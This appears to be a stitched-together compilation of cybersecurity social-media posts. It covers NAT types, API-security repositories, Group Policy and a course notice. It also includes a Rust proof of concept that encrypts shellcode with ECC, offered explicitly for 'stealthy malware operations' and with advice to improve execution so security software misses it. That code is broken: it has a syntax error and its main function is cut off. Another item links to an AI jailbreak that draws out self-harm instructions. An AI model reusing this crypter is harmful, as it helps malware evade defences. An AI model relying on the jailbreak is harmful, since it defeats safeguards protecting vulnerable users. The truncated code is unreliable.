🦑U-Turn NAT: A Simple Concept with Diagrams 🔴🟢🔵

Two days ago, I shared the concepts of Source NAT (S-NAT) and Destination NAT (D-NAT). A great question came up: What is U-Turn NAT, and how does it differ?

I realized that explaining U-Turn NAT With Source & Destination NAT provides a better understanding of how these NAT types work together. Let’s dive in!

Why is it called U-Turn NAT ?

U-Turn NAT is used when internal users need to access an internal server using its public IP address. The traffic makes a "U-turn" at the firewall as it flows out and then returns to the same internal network.

1. Source NAT (S-NAT)
🔴 Purpose: Mainly for internal users accessing the internet.
🔴 How it works: NAT changes the (Source IP) in the original packet.

2. Destination NAT (D-NAT)
🟢 Purpose: Used for servers accessed from the internet.
🟢 How it works: NAT changes the (Destination IP) in the Original packet, replacing the public IP with the server’s private IP in Translated packet.

3. U-Turn NAT (U-NAT)
🔵 Purpose: For internal users accessing internal servers using their public IP address.
🔵 How it works: NAT modifies both the (Source IP and Destination IP) in the packet when the same public IP is used for external and internal access:

Understanding these NAT types together helps clarify their distinct roles and how they work in different scenarios.

Ref:Dahri A
@undercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Using this method, there is no need to rewrite the article in humanised AI.

🦑Elliptic Curve Cryptography (ECC) Encryption and decryption.:

Process of Implementation
I implemented ECC in a way that could be useful for malware development by encrypting shellcode with a public key and then decrypting it using both the corresponding private key and an additional component called the R Point. This approach adds an extra layer of security, ensuring that only those with the correct private key and R Point can decrypt and execute the shellcode.

Note: Please go through the main function where i explained function features.

I generate random public and private keys then,

I have converted Keys into bytes for ease of handling, then reconstruct these keys for use in encryption and decryption. The encryption process involves using the public key to encrypt the shellcode and generate an R Point, which is serialized into bytes. To decrypt, you need this R Point along with the private key, which together allow the shellcode to be recovered and executed. However, my method of executing the shellcode is basic and could potentially be detected by security software, so more sophisticated execution methods would be necessary for real-world scenarios.

This Proof of Concept shows how ECC can be adapted for stealthy malware operations by leveraging its inherent security properties.

Small Snippet to encrypt and decrypt Messages
Write the Encrypt and decrypt function

// #![allow(deprecated)]
pub use k256::{elliptic_curve::{sec1::FromEncodedPoint, AffinePoint, Field}, EncodedPoint, ProjectivePoint, Scalar, Secp256k1};
pub use sha2::{Digest, Sha256};
pub use rand::rngs::OsRng;
pub use k256::elliptic_curve::group::GroupEncoding;
pub use k256::ecdsa::VerifyingKey;

fn encode_shellcode(
    shellcode: &[u8],
    public_key: &AffinePoint<Secp256k1>,
) -> (EncodedPoint, Vec<u8>) {
    let mut rng = OsRng;

    // generate the ephemeral keypair
    let k = Scalar::random(&mut rng);
    let r = (ProjectivePoint::generator() * k).to_affine();

    // compute shared secret
    let shared_secret = *public_key * k;
    let shared_secret_bytes = shared_secret.to_bytes();

    // derive encryption key from shared secret
    let mut hasher = Sha256::new();
    hasher.update(shared_secret_bytes);
    let encryption_key = hasher.finalize();

    // Encrypt shellcode
    let encrypted_shellcode: Vec<u8> = shellcode
        .iter()
        .zip(encryption_key.iter().cycle())
        .map(|(&byte, &key)| byte ^ key)
        .collect();

    (EncodedPoint::from(&r), encrypted_shellcode)
}

fn decode_shellcode(
    encrypted_shellcode: &[u8],
    r: &EncodedPoint,
    private_key: &Scalar,
) -> Vec<u8> {
    // Compute shared secret
    let r_point = ProjectivePoint::from_encoded_point(r).expect("Invalid R point");
    let shared_secret = r_point * private_key;
    let shared_secret_bytes = shared_secret.to_bytes();

    // derive decryption key from shared secret
    let mut hasher = Sha256::new();
    hasher.update(shared_secret_bytes);
    let decryption_key = hasher.finalize();

    // Decrypt shellcode
    encrypted_shellcode
        .iter()
        .zip(decryption_key.iter().cycle())
        .map(|(&byte, &key)| byte ^ key)
        .collect()
}

>> Write the main function for operation

fn main() {
    // Example string => lets name it as shellcode ie (placeholder)
    let shellcode: &[u8] = b;"Hello, World!"

    // Generate ECC key pair
    let private_key = Scalar::random(&mut OsRng);
    let public_key = (ProjectivePoint::generator() * private_key).to_affine();

    println!("Private Key: {:?}", private_key);
    println!("Public Key: {:?}", public_key);

    // Convert AffinePoint to VerifyingKey (or PublicKey)
    VerifyingKey::from_encoded_point(&EncodedPoint::from(public_key))
        .expect("Invalid public key");

    let (r, encrypted_shellcode) = encode_shellcode(shellcode, &public_key);

    println!("Encrypted Shellcode: {:?}", encrypted_shellcode);

    // Decode the shellcode
    let decrypted_shellcode = decode_shellcode(&encrypted_shellcode, &r, &private_key);

    println!(
        "Decrypted Shellcode: {:?}",
     

Ref: github by Kavinarasu I
@undercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Free Deep Fake Models List :


https://github.com/MitchellX/deepfake-models

🦑10 awesome GitHub repos to learn and practice API Security

1. awesome-api-security
- https://lnkd.in/gKSX8Sj8

2. 30-API-security-tests
- https://lnkd.in/g-JShXbi

3. API-Security-Checklist
- https://lnkd.in/gdfGV6ev

4. api-security-study-plan
- https://lnkd.in/gkfrAnpK

5. API-Pentesting-Checklist
- https://lnkd.in/gx6Q549z

6. API-Security-Checklist
- https://lnkd.in/gKVUpzWe

7. API-SecurityEmpire
- https://lnkd.in/gZEkf2wB

8. 31-days-of-API-Security-Tips
- https://lnkd.in/g8SCiVAZ

9. APISecurityBestPractices
- https://lnkd.in/gBDWSBvK

10. apisecurityinaction
- https://lnkd.in/gUxJ8HCy

Ref: Ankita Gupta
@undercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑In Active Directory Domain Services (ADDS), you can enforce Group Policy updates across all computers in your domain using the following command:

#security #tips

gpupdate /force

This ensures that any recent changes to Group Policies are applied immediately, enhancing security and compliance.

Ref: Milandeep kaur S.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New AI Jailbreak Meth:

Suicide Bot: New AI Attack Causes LLM to Provide Potential “Self-Harm” Instructions

https://youtu.be/AS2kJgOgyQ4


» Doc :
https://www.knostic.ai/blog/introducing-a-new-class-of-ai-attacks-flowbreaking

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Top Malware Analysis Tools:

Ref: Harun Seker, CISSP
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New (free) Course Launch- from the Open University Cisco ASC - focussing on UK Legislation for Digital and Cyber - it is currently a beta, however all educators and students may use this resource